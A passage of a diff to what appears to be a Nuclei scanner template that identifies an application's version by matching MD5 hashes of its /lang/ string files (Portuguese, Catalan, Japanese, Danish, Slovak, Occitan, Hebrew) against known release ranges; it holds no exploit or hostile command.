"(\"27b44334d321a6dcf2dfcb4bc54b9594\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"9409aae891162d709a40b687374d54c0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"35865a638ffd0fd371928505cf098237\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"93b4ed9000f7ba7ea919f42a8a4fe567\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"34ae9664e46e726e10dfbea266710521\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"1843bfb295a13ad78aba6bef0bc3159a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a08988c8e39a164b833853098595b4b7\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"8e34a421cefb5b133215e3af42d74607\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"6a67e1ce4630ab05c14b981662678346\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c155baec9b3626cb367b94ef74267189\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"2f13ac23a778a6719b1993f0e59179ad\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"8f256005f38ce683d3b0e9da97a1f396\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"ce279b6a04687bf6a29f186d81fc4bae\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"9eed482682bc657018d25558e6590ef9\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"d2ee333b710ad01cb92b50c5a93d128c\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"8cacf3544ca80c05c53a6d352db2903d\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b2fd00f33728b26b400188252f668b81\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.9.1 + dsl: + - "(\"7d8dfb7d51f0c477fdbe0115688b42c3\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"526673b481c154afccdc051d6f4663b5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"e4eaee55e95f35a73c67729cc0818818\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f9b2cc084aa49d4867407d7e3202f8ee\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"9fc95d8da5cf01692d8efc0f775fcf23\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"a3ac7a1f696a29bccc8c29aba832b3d4\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a632cff2f830de441cc49f8fb802249d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"44122e4a3c3b5c3ae6eb77a9bb0de36a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"cd19c9715b1dfdae59448d48b0e47d85\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"988e009ab3ef82b5f2e73d85202a3412\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"cbf8b853aea23740f6cf475724171259\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"42bca0e12fbe37dee62e17e1b5eb167c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"c9c796667adac74370bbe953e89e37da\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6d34aa361df335ce328be1d1df3b7fd4\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d9db365d3332d44f0be1de0d04e251cf\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"d65d81fc67bcbb774bc082744bc0ad00\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"9df514454247fca115fd512254a87d0c\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"51b5bda290313fe8c7aeb187151c7d8c\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"82dcb3247322cce75caab51e850ee027\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"6fdbc9b6ca0fa4d351a2edf236a08dcf\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"537b0826c241681cdeabd5e62ef09fc7\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2bf313f42df764f410b1221ea04cb1a0\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"c3c1dd9e4771e16629de33fc369cc174\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"52702c9cd16eacdac074fc042b18e852\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"ce6ac63ceac2a3ac98d8530877367a7c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9aec8fb8df24e1cd5de6c6c818ec6c6a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"92cd6d9b4122048e2d3b63154ec34dbf\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"3f82087a9fd75b559a7cc7ef18157a7b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"2e47e58257394b655b8ec6250431e5cb\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.18.1 + dsl: + - "(\"4e810e9d45f5778e1605692b6de9a867\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"dc553c50021064e35660996a634e8ea8\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"14c1223a88ac131dfb165d17c23a838d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"cc940b9b020518f8b9236866e0a36e20\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"8c47c7a8a2b911eddc92351df7c8be94\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"98bbdbdad337068b82d92d33ad180cea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_catalan.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.9.1 + dsl: + - "(\"3cb79c78078373c43037796cf993d889\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"d8c95a008d25dbda05c37818004b9b59\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ea84daaece86c922fb24616804380193\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"934da71928b460dc55f5da04f2185470\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f96a3462e92c549e3ee8ad57f62c1bae\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"1ecccb4604a06647463a6ed9ec050fe9\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"f7075fa6697e2a9d8ec9ace2c5282a4d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ed425bd79f31377d8ac459213563c87c\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"0e4dd5956de8a8d69ee88825469afc0b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"59fd17c808213faa26dfefd2399988a4\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"d9676c816a8cf70f353f579483df6993\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"4ed33f40279f6ee1e139e429ee7e6a1b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"19c5916498018dbdb088e93049671407\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a1fdb062a3b355fa7601d213a6afb2fd\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"d861a2964f5ecff054bd9a79f78f610b\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"285a6538c5f7b662b720a3d9c9f54210\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"efc04df18113b13b06e2b8d0f6d3b711\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0e6af1133f8ffccbdc05af197531cc95\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0acb39cc965c577fbc9f8a8af81ee2b6\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"eb1fd49f07df03fc3931936c7d204f89\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"99d6560de812b125c9cb13d51bf26673\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"db295f066e9c4d552308ee95d233bfed\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a2cae1c35b7ee7c27e90ecb85e7f51ce\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f564f7749b36076cb73ca3680157c3aa\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"f6bef6ae57c674925bc7c1ef7b37c00c\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"a7513aa8d6878f32184ba96cacf653d1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"fccf34d3d37eb1191d2e1286e1d58a86\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"46f04d84a13649d5c3600717eb10e582\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"a33dc7cbeb3e9339ff8693400fa28d8c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"b46210c83c4cf504df5f6bf9b3f4add4\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"b7682f069013901d15e50fc09835f5b1\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"147cd0f8250b48f110355b83ac9d3413\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"3e5e3438c6660c6658e5873f639e0e1c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8bb063656e08eb9d5b8d6e13b2b1eadb\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"4a691fc1966e7303769e0afd6c826962\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"8a65cf87e6c7242149cdf46d3a2f25f8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_japanese.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.11.1 + dsl: + - "(\"c13c1338ec31d25381ec0ffc5807c301\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"1aef5ab42a65be8d6328832345296d82\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"26ac0412557b6849299580998f2cfc5d\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"e9016bd0c23c71240d1c66efd44147fa\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a4fd71147599c75a8c9d739a78ca06f4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"12d6e5a5368bd5bf91d2517faf5823b6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"24b5874e1399b04f5b1a54fddcc83c63\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8891573214d57bd7a76e58d7c88a92b0\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"291b17fc99c3f42ef487ed3f66715a26\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"62a2250f7e053d63c96e9480757f8850\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"582873db5ab0f53a1b644662aa75058d\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"bf47cd25e313888c9911826fc526835d\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"bbf27b021b48646414846101c39c633c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"fd092635048b42f42cf0b93571da1a15\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ea453f14f4183c43a08025e7d5c797e1\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a317d365a0f5006f631c3ea83f9bc465\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6e96b35cf89b629fe929f44b2ba32113\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"30e871f2a98bf92cdb1fed1d0f8ea1bc\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8ab63838694c87b031d8b8b105a70f32\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ca2a6cb6706beb92fc2abde3559902c5\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"17b41e75a64d4ca3fae70f8fb9ddbb13\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"5a1237b5106071fa57091fd7198f5bfd\" == md5(body))" + - type: dsl + name: 1.1.4 + dsl: + - "(\"f37c58fb969de3546e3a44edfd3f1a9f\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.3 + dsl: + - "(\"be6479322769eb7ab90fbbc81605536d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a333262b9d6dcd1ea5dd81195f7fbcdd\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"22ee048b63eb282a98bc3f80b6fed84f\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7437f70a6a005b0204bbf01a7e692f93\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"7cc5c0d55ad12f28bd187f278d2f86dd\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"590c99952a0de4e5ab5e8544bb07661b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"f70553a8bcc8fcf48460bee428cfeb6b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"2744368571a3a71e31b51e0b8e12d153\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"420fc622e18bea28b0223616cc0d75a4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.6.0 + dsl: + - "(\"eaf3645ca04e5baf726aa986f9a8ef0e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5af0b35751b09f571f6093746cb67bb0\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"daa351395b24eb0aa2a252e969d5b770\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ec84f962e7da0534d22663237ec6c97b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8b3518a91f90b92c4034d3a592d9151b\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"8c68a576e968cfc2d0e2cbb144a4ec19\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"1f4b70cf0e0429240091aed377364f92\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"212a745fb4c1f87bdb7099a491ed834a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"3dca6c95850eac1d65863ab9fac076cf\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"0d21722b99d1e59c0d16edb1605e5f9c\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"221300a986c9f5307b83119a4b8852e2\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"95eeee04b1e13040f7403508ad061cc3\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"d3987500d953f917d786aee51924b40a\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a969366456d5bb251197f096f28a6526\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"7ec4986e4110da8e81b2188139b77d20\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fc6e50d5b6f6747c46745f53e89e8033\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"be755a670d5f5a56ef1ee8d7a043d852\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"0c52851da6e7436907703eea30116607\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"28befc59aa6fa4e04ecb5a9c790a0847\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"04950fe098b46ae6c4a58834afe462aa\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4c0809eeb0788e35610d279b86424c18\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"e97aeed7f0296dd1da92621e5baa25b5\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"fc8a8b3e95553acc3027bac792c91d3c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.10.1 + dsl: + - "(\"3d28864340611ce208f6008f17f5d550\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"f8275a4f07f6fdd204c0e43e6479c4b1\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5d46140c175c60c3f5d21901e394594e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"3455a72333dfd4497e90be688ba26625\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"c3b7b8a5a347fd17b2f694e2164de39e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"102de544712586270814e56e311d6883\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"d72c8bf54f8bf5e45eb65bcc6e1ae4e9\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"e46470bd256e0f97a766a7d89a429e88\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"5c080562ff33151fa3a08ad966cb475b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"3f931cfa3fcdebaaf534367e40495a5f\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d848366c69f9a96ba233dccd4764e84a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"f97438d48213a1b13f85f47ee33b0cae\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"cb43316d87d72562a27118ef58425611\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"f2d91bda23e34352ea4e90d3bf69c8cb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ab082526b97700734b01d34fe69d7bf5\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"11653f61380b6a1cb70584a60c32c323\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"267437b770572a9232d30ef6f088e9fe\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"f89ffafd5683bae3295620d38b4a2b6f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"94a3b113d3b37d1e23c8b5e229b7b448\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"14c3dda2b8896ccbe79bbfe1aec83580\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"4f289b5e6bd3629dba79c779b17258a0\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bea98a0f6c648ab7239f45ed36a169f2\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"c9d36ead499466f74f0bf9eb078d69a4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"08097c0ee5f93b649a550a70ca99cbb0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e2d3ec35f802179ece1c2d2137cff601\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"cc89e3d5f31aefbae01017316611413d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"fd3928a617abaed4a849fd5b5e5ae225\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"90662ef82a5ffb650b53cfca357663c7\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"75b651a8db3205dc32729ce0302a92e4\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"560c2028f99229a971b715dfcdd7bfa3\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"aa2668a2ea708030a0b857a0a216e6b9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"5c6a38551c98a611478d666444c0fc68\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"e3b73bd85bc419301a1cdae0b5bbb1a1\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"e13af38756f38d766e5aa40771d64da3\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ead7b72101e683a65263470e6be28122\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"83b103dbfe5e7a84a77865685d3ba47b\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"8866c34a87c5da2498386f070592b010\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"f21da27995c24fb6703015aa4c10923b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"9badd1d6620ad387b31d0f41853f990d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.23.1 + dsl: + - "(\"8ea8ccce9a722abaf31aa2f21f7f04ed\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"db6544c0faec37f8155172a0d027e85c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_occitan.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.11.1 + dsl: + - "(\"fa4f637905fbf7bc99fc718498588ee1\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"35d3853e396e07b0c809922d07689a6e\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"13c86d7a2226ab16003ba9bc80496ddd\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"254df48d9a7a6d8207f87e45a88b49a4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"9addcd6d6dba324e05e45eed6a2e9adb\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"01b6175b1231f7276c862018df2cc475\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"fb0c6a9dc40228a959b6879451a26c98\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9328816e32536e6e50cde5e119acd860\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"1219d1d6b5a67b7b7ce274a91140097b\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"0ef384317ed71f8cbad974a30a16cdb1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c321e840de377ac462e2e893eb54d6aa\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"d8398d1a7b591aea884662666fa0f5a2\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e9bacf19e8d0a1145a1dc4c95abaa299\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"cd09412d0aa8302a9378eac3bc64246d\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"a72fa053e9064244794f9d8cdf9bef44\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"06e2ac3381e787a526ccaf471c23da72\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5809689c7cf934fb33e8dd925ebc0f1a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"768cc3b757998b8a9a342de466ab0566\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"2cc425d12e245fc177ce29b7a718659c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"8313d97d64a170e66f52e06d1074ce44\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"7494d0055a8dfc67b1d5c87c37508efd\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"e042344a2dec8c9a90692e7c7f245695\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"71fbcabb549037667e03bc67051322a2\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"bba2067c5583175d7caa140f04dce775\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_hebrew.txt" + + matchers: + - type: dsl + name: 2.3.0 - 2.11.1 + dsl: + - "(\"522264695bd0f78a8dd68d60e1961b91\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"c03b02018a691214e8339068bfadbb20\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"fd21856873dbe59311fdb01cbd560df4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"5bc88498f86a6df55d64fd7284259a2b\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"b6bca3b230705715770e834f3b41a125\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"d6868fda773cb604e92d1e4680bf890e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"de138cf9480d5c0f1f6d798443b76dfb\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"6ba72565383f8af1d62326152fd47036\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"4eeafa16646b88867cd7693339267464\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"f25b1715d3880346a6e8515caebeecbf\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"c8053471a64735af7c2b0c99e823bd5a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"5075cfbd5a048ec5291550f63610df01\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"89daa8b56b7e9bc2640fbc878f821ced\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f39b7081d81adf00cd249d0731a1f85f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"4f8031c89961e20ba71ac39a1c8a17b2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"fd4ef48e4b57fcb980dd035f88f951c6\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"be3e045ddc44fa5984d9d43bfd927bac\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6917489f024182b8f90e93b050780788\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"7b4261eabf215fea11c44794153df2d6\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8f6001ca3047738453954e5a9e234909\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"102ed63d7a7c7cac2f67cc6e46c84402\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"ff66de56190e24b10f530cf5de727561\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"a1921884b3f0a4f9cbdc8be42ce29519\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"5f69a2d6ea813d298460f5dccf3acc00\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - 